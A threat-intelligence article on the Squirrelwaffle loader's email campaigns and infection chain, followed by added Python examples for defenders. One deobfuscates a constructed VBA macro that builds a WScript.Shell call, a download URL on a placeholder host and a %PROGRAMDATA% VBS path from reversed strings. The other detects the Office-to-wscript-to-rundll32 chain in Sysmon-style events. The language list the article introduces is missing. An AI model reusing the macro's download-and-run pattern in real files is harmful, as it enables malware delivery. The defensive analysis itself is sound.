Threat Actors Using Squirrelwaffle Loader to Deploy Qakbot & Cobalt Strike Malware

Soon after law enforcement agencies disrupted Emotet, one of the most widely used botnets, Squirrelwaffle emerged as a replacement for it. The first signs of this new threat appeared in September 2021, and distribution volumes peaked toward the end of that month.

Squirrelwaffle is a newly observed loader that drops malware such as Qakbot and Cobalt Strike onto compromised systems and networks, and threat actors are actively spreading it through numerous malicious email campaigns.

It is possible that Squirrelwaffle is a reworked version of Emotet, rebuilt by members of that operation who escaped the law enforcement action; it may equally be a fresh attempt by other threat actors to fill the gap that Emotet left behind.

Researchers at Cisco Talos, who analysed the campaigns, have urged security teams and organizations to stay alert to the new TTPs these threat actors are using.

Email Campaigns & Languages Used

In addition to hijacked reply-chain email campaigns in English, the spammers also send emails in the following languages:

To trick recipients into enabling macros in the Microsoft Office suite, the threat actors use DocuSign-themed lures.

Attack Procedure

According to the report, "A malicious .doc or .xls attachment is typically attached to an email that links to malicious ZIP archives hosted on attacker-controlled web servers and runs malware retrieval code on opening."

The macro code is obfuscated with string reversal. Once decoded, it writes a VBS script to the %PROGRAMDATA% directory and executes it.

That script then fetches Squirrelwaffle, in DLL form, from one of five hardcoded URLs and drops it onto the compromised system. If the DLL is delivered successfully, it is executed via rundll32.exe.

The malware then attempts to communicate with its C2 over HTTP POST requests containing obfuscated data. The body of each POST request includes the following information about the victim system:

The %APPDATA% configuration
The hostname of the system
The username of the victim
The workstation configuration of the system

After completing these stages, the Squirrelwaffle loader deploys follow-on malware such as Qakbot and Cobalt Strike. Once beacons are deployed, the threat actors use cracked versions of Cobalt Strike for post-exploitation and remote access to the compromised machines.
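The string-reversal obfuscation and the %PROGRAMDATA% dropper described under Attack Procedure are easy to undo statically. The Python script below is an added example written for this page, not code from the article or from Cisco Talos. The VBA fragment it works on is constructed to mimic the described technique; the domain example.invalid, the file names update.vbs and squirrel.dll and the helper name WriteDropper are placeholders for the example, not indicators from the campaign.

```python
import re

# Constructed VBA fragment that mimics the technique described in the article:
# string literals are stored reversed and rebuilt at runtime with StrReverse(),
# then joined with "&". The domain example.invalid and the file names are
# placeholders for this example, not real indicators.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim sh As Object, path As String, url As String
    Set sh = CreateObject(StrReverse("llehS.tpircSW"))
    path = StrReverse("sbv.etadpu\%ATADMARGORP%")
    url = StrReverse("dilavni.elpmaxe//:ptth") & StrReverse("lld.lerriuqs/ld/")
    Call WriteDropper(path, url)
    sh.Run StrReverse("exe.tpircsw") & " " & path, 0
End Sub
'''

# StrReverse("...") wrapped around a plain string literal
STRREV_RE = re.compile(r'StrReverse\(\s*"([^"]*)"\s*\)', re.IGNORECASE)
# two adjacent string literals joined with VBA's & operator
CONCAT_RE = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')

URL_RE = re.compile(r'https?://[^\s"\']+')
# %ENVVAR%\relative\path, e.g. %PROGRAMDATA%\update.vbs
ENVPATH_RE = re.compile(r'%[A-Za-z_]+%\\[^\s"\']+')


def deobfuscate_vba(vba: str) -> str:
    """Statically undo StrReverse() calls and fold literal concatenations.

    Only string literals are touched; variables and function calls are left
    alone, so the output is still VBA, just with readable strings."""
    text = STRREV_RE.sub(lambda m: '"' + m.group(1)[::-1] + '"', vba)
    while True:
        folded = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
        if folded == text:
            return text
        text = folded


def extract_iocs(text: str) -> dict:
    """Pull URLs and environment-relative file paths out of deobfuscated source."""
    return {
        "urls": sorted(set(URL_RE.findall(text))),
        "paths": sorted(set(ENVPATH_RE.findall(text))),
    }


if __name__ == "__main__":
    cleaned = deobfuscate_vba(SAMPLE_VBA)
    print(cleaned)
    print(extract_iocs(cleaned))
```

Running the script prints the macro with its strings restored, together with the download URL and the drop path it hid. On a real sample the same pass is the first step before reading the dropped VBS and enumerating the hardcoded download URLs the article mentions; macros that also use Chr() or Replace() tricks need an extra folding rule each, written in the same style.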
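For the execution chain described above (Office document, VBS written to %PROGRAMDATA%, rundll32.exe loading the fetched DLL), here is an added detection example in Python, written for this page rather than taken from the article or from Talos. It runs over constructed process-creation events laid out with Sysmon Event ID 1 field names. The assumption that the DLL is also run from a user-writable directory such as %PROGRAMDATA%, and the list of directories treated as user-writable, are this example's own, not facts from the article.

```python
import re

# Process-creation events in the shape of Sysmon Event ID 1 fields. They are
# constructed for this example, not real telemetry: the winword -> wscript ->
# rundll32 chain mirrors the article's description; the explorer/svchost
# launches and the printui.dll call are benign controls.
SAMPLE_EVENTS = [
    {"ProcessId": 5012, "ParentProcessId": 4120,
     "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'wscript.exe "C:\ProgramData\update.vbs"'},
    {"ProcessId": 5300, "ParentProcessId": 5012,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"rundll32.exe C:\ProgramData\squirrel.dll,ldr"},
    {"ProcessId": 6001, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"wscript.exe C:\Scripts\logon.vbs"},
    {"ProcessId": 6100, "ParentProcessId": 900,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"ProcessId": 6200, "ParentProcessId": 6001,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\printui.dll,PrintUIEntry"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Locations a standard user can write to. The article only places the VBS in
# %PROGRAMDATA%; treating AppData and Windows\Temp the same way, and assuming
# the DLL is dropped somewhere similar, is this example's assumption.
USER_WRITABLE_RE = re.compile(
    r'(?i)(?:^|[\s"\'])[a-z]:\\(?:programdata|users\\[^\\]+\\appdata|windows\\temp)\\')


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return one alert per matching event, plus a chain alert when a flagged
    script host goes on to launch rundll32 on a DLL in a user-writable path."""
    alerts = []
    flagged_script_hosts = set()   # ProcessIds of script hosts spawned by Office
    for ev in events:
        image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        cmd = ev["CommandLine"]
        in_user_writable = USER_WRITABLE_RE.search(cmd) is not None

        # Stage 1: the Office macro writes a .vbs into ProgramData and runs it
        if (parent in OFFICE_APPS and image in SCRIPT_HOSTS
                and ".vbs" in cmd.lower() and in_user_writable):
            flagged_script_hosts.add(ev["ProcessId"])
            alerts.append({"rule": "office_spawned_script_host_user_writable_vbs",
                           "pid": ev["ProcessId"], "cmd": cmd})

        # Stage 2: the script runs rundll32 on a DLL outside system directories
        if parent in SCRIPT_HOSTS and image == "rundll32.exe" and in_user_writable:
            alerts.append({"rule": "script_host_spawned_rundll32_user_writable_dll",
                           "pid": ev["ProcessId"], "cmd": cmd})
            # Tie the two stages together through the parent/child ProcessId link
            if ev["ParentProcessId"] in flagged_script_hosts:
                alerts.append({"rule": "office_vbs_rundll32_chain",
                               "pid": ev["ProcessId"], "cmd": cmd})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f'{alert["rule"]:48} pid={alert["pid"]} {alert["cmd"]}')
```

The two single-event rules fire on their own and are useful individually, but the chain rule is the one worth paging on: a script host launched by an Office process that then starts rundll32.exe on a DLL under ProgramData has no ordinary business explanation, whereas rundll32.exe on a System32 DLL from the same wscript.exe parent (the printui.dll control event) correctly stays quiet.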